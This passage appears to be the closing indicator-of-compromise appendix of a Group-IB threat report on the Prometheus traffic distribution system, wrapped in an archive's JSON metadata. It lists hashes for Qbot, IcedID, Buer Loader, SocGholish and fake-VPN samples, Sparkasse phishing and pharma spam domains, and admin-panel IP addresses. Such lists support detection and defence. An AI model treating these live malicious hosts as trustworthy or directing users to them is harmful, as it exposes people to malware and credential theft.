SHA256\r\n0208_4507371754789.doc 13efab9b32eab02313e4a722f7d0641f c90808c2c5ec20144946f639fdf4f71aa9c4c581 4f68b92f54f16dcb1e9b\r\n0406_112731578493472.doc 364f80a5b16841597256388191a2981e d257de7c62bff91bdb58ef46091560f637b25d09 9d8038cd3b64b9f8907\r\n0208_52726880046401.doc 88d441d2d41cecbf700ed16d5437dd7a ef5d8322363833a1c8ab3e04280f9fd5df00e38c c5092251d9a2b6a2aa3\r\n0208_52726880046401.doc 88d441d2d41cecbf700ed16d5437dd7a ef5d8322363833a1c8ab3e04280f9fd5df00e38c c5092251d9a2b6a2aa3\r\nQbot\r\nFilename MD5 SHA1 SHA256\r\ndocument-12603942.xls\r\n0e1134acbb0bc58770345c3874a80189 2d74e52ac0e3ebbf2bb4aabb6469cba9badd70eb 8932db61f72108f0af9267056e74b0e09\r\ndocument-348056604.xls\r\n24f7520283e02868e262dc9d595c7540 db23b35b2c2b8bf413fb57ee9017127f651e0304 a5326a661319bd7a8ab027a22fb8bb0b\r\nIcedID\r\nFilename MD5 SHA1 SHA256\r\nDocuments_682784324_1073289308.xls 79af726897412573ba50ad5b9ad168f0 d396268c483bbb5bf5c23198be569c7ef93a0223 3041387a18d\r\nVBS Loader\r\nFilename MD5 SHA1 SHA256\r\nkurt.troyer_8816201.zip 196ab58d25d3548c90472875a33743c6 58db5164840e053e7d20a136d4afdc9a3c4d6df2 16a5398065a79fa0ee83cb40\r\nmike_5131337.zip 89ee343062cbb8e2fa70204cb0574b88 75f68a7de72c53fd87a6ff161e2b4dfe4273b647 5953e3aa6c6b1d7330f54e4f\r\njtorres_35107.zip ea967b761036ea62e17a3e1e8d9e6941 9bc673671d293d0787a77c8240bc8173ae68222c 2b7686542959ce1e6b355f4\r\nBuer Loader\r\nFilename MD5 SHA1 SHA256\r\ndocument010498.zip c2263a4741865a59adbf94f6e8089b62 c2fe78d027669d8fafec394718baa37cac529177 e44d72b2e48262424c9f0c62a9e9f\r\nSocGholish\r\nFilename MD5 SHA1 SHA256\r\nChrome.992d73.zip 60eea3a21bf7eda64e4dc09f490658da 4f5ac7c2f7097bbdcabfccb9a3a6bbbe99f929b7 14a2744c4278bfdc4197793\r\nChrome.Update.60bfbc.zip d32f0c13bd4041bd59fe4a3b6e1f5a24 68b9c9217d81afea86e40d8789f4cbdedcf50697 e54a05f127c3c775ce5a7163\r\nFake VPN\r\nFilename MD5 SHA1 SHA256\r\nWindscribe.exe a70ae53c00fb51ef317c045dd8066e17 f729b75d68824f200bebe3c3613c478f9d276501 1495500d6c8613fda22b0e0c8f2ab0ba5\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 35 of 37\n\nFilename MD5 SHA1 SHA256\r\nPharma spam\r\nhotaiddeal.su\r\nyourmedsquality.su\r\ngoodherbwebmart.com\r\nella.purecaremarket.su\r\nPhishing websites\r\nbanking.sparkasse.de-id1897ajje9021ucn9021345345b0juah10zb1092uhda.xyz\r\nbanking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz\r\nbanking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz\r\nbanking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz\r\nbanking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz\r\nbanking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz\r\nbanking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz\r\nOther samples\r\nMD5 SHA1 SHA256\r\n045c33237a9843a2ece09e00203f2368 76b375a2cf40ebbba72b0f622d2426d9ab86d443 cd4164aee2890fbdf1b61b3b09a37b8857f6b3c87ceef29a\r\n02aed8241295fbdb0a6393393f2eb688 74c1635011e4ce39205ee5884e22c96222d56cbb 53f16cc3aa9b674651f2e69e02f1c91849123e8a98cb7a85\r\nbacb64855f41f9a29b7f1005dc8c7f33 89228658d3486902dd4bc1cd77b4565253ecad33 9c203cd2e56cce3e484bd447470c21cff9e9163ee4095d23\r\n447bc4b2c75fd0ace42bd31b35f9f743 a20727101268130bf02fbef225481f6130c01582 c6677e676ec1049bb877a7ea6c424d7505e0b5ecfb4c1a2\r\n3eb5461d2b200cce8e90c4c8db2fba96 a7aeb4a887810f978ffa91ca9ed890fe9279a465 858a42b43d4262aded023a166a01e6e43271b0a619e23b5\r\nffcf6712b62b87f44bcd7b3662308c5a df5e7cd307451a6c1ba6c0bc8901d4119a7e387b 38713d11d588217d0e86ba3ea8a8dd550c368dad3b910a1\r\nBRChecker Admin panel\r\n109.248.11.85\r\n109.248.203.202\r\n109.248.203.50\r\n185.186.142.32\r\n185.212.131.44\r\n188.130.138.16\r\n188.130.138.22\r\n188.130.138.236\r\n188.130.138.61\r\n188.130.138.63\r\n188.130.139.107\r\n188.130.139.158\r\n195.62.53.109\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 36 of 37\n\nSource: https://blog.group-ib.com/prometheus-tds\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 37 of 37",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/prometheus-tds"
	],
	"report_names": [
		"prometheus-tds"
	],
	"threat_actors": [],
	"ts_created_at": 1777949116,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.pdf",
		"text": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.txt",
		"img": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.jpg"
	}
}